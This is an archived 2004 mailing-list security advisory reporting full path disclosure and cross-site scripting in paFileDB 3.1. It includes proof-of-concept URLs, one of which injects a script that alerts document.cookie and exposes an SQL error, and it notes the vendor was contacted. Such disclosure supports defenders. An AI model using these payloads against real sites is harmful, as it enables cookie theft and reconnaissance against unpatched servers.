[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Multiple vulnerabilities paFileDB
- To: bugtraq@xxxxxxxxxxxxxxxxx, info@xxxxxxxxxxxxxx, submissions@xxxxxxxxxxxxxxxxxxxxxxx, full-disclosure-admin@xxxxxxxxxxxxxxxx
- Subject: Multiple vulnerabilities paFileDB
- From: "k1LL3r B0y" <k1ll3rb0y@xxxxxxxxxxx>
- Date: Tue, 27 Apr 2004 21:41:04 +0200
Advisory: http://bichosoft.webcindario.com/advisory-04.txt
#########################################################################
###################### :.: DarkBicho :.: ################################
# #
# PROGRAM: paFileDB #
# VERSION: 3.1 #
# URL: http://www.phparena.net #
# BUG: Multiple vulnerabilities #
# DATE: 27/04/2004 #
# AUTHOR: DarkBicho #
# WebSite: http://www.darkbicho.tk #
# Email: darkbicho@xxxxxxxx #
# Team: Security Wari Projects <www.swp-zone.org> #
# #
#########################################################################
#########################################################################
1.- Vulnerabilities:
---------------
A. Full path disclosure:
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive information.
http://site/includes/admin/login.php?formname=DarkBicho&formpass=DarkBicho
&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do
and we get standard error messages, revealing the full path to the nuke
engine scripting files:
Fatal error: Call to undefined function: locbar() in
/home/site/includes/admin/login.php
on line 12
http://localhost/includes/category.php
http://localhost/includes/search.php
http://localhost/includes/main.php
http://localhost/includes/viewall.php
http://localhost/includes/download.php
http://localhost/includes/email.php
http://localhost/includes/file.php
http://localhost/includes/rate.php
http://localhost/includes/stats.php
2. Cross-Site Scripting aka XSS:
----------------------------
Cross-Site Scripting in id variable:
http://localhost/pafiledb.php?action=category&id='<script>alert(document.cookie);</script>
paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near
'(document.cookie);'' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_cat WHERE
cat_id = '''
3.- SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the Video Gallery website for updates and official release
details.
4.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"El pisto es y sera peruano"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho@xxxxxxxx
---------------------------------- [ EOF ]
------------------------------------
_________________________________________________________________
MSN Amor: busca tu ½ naranja http://latam.msn.com/amor/